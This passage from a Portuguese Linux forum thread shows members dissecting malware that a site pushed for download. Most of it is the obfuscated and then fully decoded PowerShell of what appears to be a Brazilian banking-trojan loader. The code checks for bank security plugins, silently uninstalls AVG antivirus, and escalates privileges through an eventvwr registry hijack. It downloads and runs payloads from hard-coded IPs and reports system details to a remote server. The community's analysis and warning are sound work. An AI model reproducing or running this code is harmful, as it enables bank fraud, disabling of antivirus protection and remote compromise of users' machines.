QBjAG4ATgB2AEIALwBqAG0ANgBIAHcAUABWAFgATQBFAGMANwBlAEcAMABLADEANwB5AEEANgBzAEIAVwBPADQATgBQAFkAMwAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA "; } $durl = "http://130.211.157.13/artw/arquivo" Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')" $tudo = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,67,73,77,86,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,42,32,70,82,79,77,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109) -join '')); $w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse(); } } $mtx.ReleaseMutex() $mtx.Dispose() }
30. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
andremilke
(usa Debian)
Enviado em 25/11/2016 - 12:55h
Terminei de decriptar a função toda$ie = New-Object -com internetexplorer.application; $ie.visible = $true; $ie.navigate(""); $mtx = New-Object System.Threading.Mutex($false, "mtt") if ($mtx.WaitOne(500)) { if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){ (Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')" if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) { $dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0]; $gbPath = Join-Path $dir (GbPlugin -join ''); $paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";}; foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}}; $avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join '')); foreach ($av1 in $avs) { $av += $av1.displayName + ","}; if($av -like "*avg*"){ Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString; $uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString; foreach($uninstall64 in $uninstall64s) { $uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X",""; $uninstall64 = $uninstall64.Trim(); if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64 /qn /norestart" -Wait }}; foreach($uninstall32 in $uninstall32s) { $uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X",""; $uninstall32 = $uninstall32.Trim(); if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32 /qn /norestart" -Wait }};"'; $path = "HKCU:\Software\Classes\mscfile\shell\open\command"; if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){ New-Item $path -Force | New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null } else{exit}; $eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe"; Start-Process -FilePath $eventvwrPath; Start-Sleep -Seconds 5; $mscfilePath = "HKCU:\Software\Classes\mscfile"; if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait; while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;} } $ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version; if(Test-Path $(Join-Path $dir (WinRAR -join ''))){ $wr = (.:Winrar-join '') } if($v1) { $durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab" $ll = "COF267F9415EF3518C.cab" $output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll; (New-Object System.Net.WebClient).DownloadFile($durl, $output); Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E $dd = 'COF267F9415EF3518C.cab,C3F5EBEC1'; $command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd; $path = (HKCU:\Software\Classes\mscfile\shell\open\command -join ''); if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){ New-Item $path -Force | New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null } else{exit}; $eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join ''); Start-Process -FilePath $eventvwrPath; Start-Sleep -Seconds 5; $mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; "; } $durl = "http://130.211.157.13/artw/arquivo" Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')" $tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join '')); $w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse(); } } $mtx.ReleaseMutex() $mtx.Dispose() }
31. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
removido
(usa Nenhuma)
Enviado em 25/11/2016 - 15:37h
Já viram a localização dos ips que aparece no arquivo?http://130.211.157.13
http://31.220.57.180
Me lembrei de uma palestra que tive na faculdade sobre PowerShell para Linux.
https://azure.microsoft.com/pt-br/blog/powershell-is-open-sourced-and-is-available-on-linux/
Cuidado para quem tem o PowerShell instalado mesmo que o arquivo seja feito para Windows aparentemente.
Patrocínio
Site hospedado pelo provedor RedeHost.
Destaques
Artigos
Programa IRPF - Guia de Instalação e Resolução de alguns Problemas
Criando uma Infraestrutura para uma micro Empresa
Criar entrada (menuentry) ISO no Grub
Como gerar qualquer emoji ou símbolo unicode a partir do seu teclado
Dicas
O Que Fazer Após Instalar Fedora 42
Debian 12 -- Errata - Correções de segurança
Instalando o Pi-Hole versão v5.18.4 depois do lançamento da versão v6.0
Tópicos
O FIM da minha distro predileta: ARCOLINUX ...que pena (6)
Copiar Layout do Teclado para aplicar em outra Distribuição (1)
Top 10 do mês
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
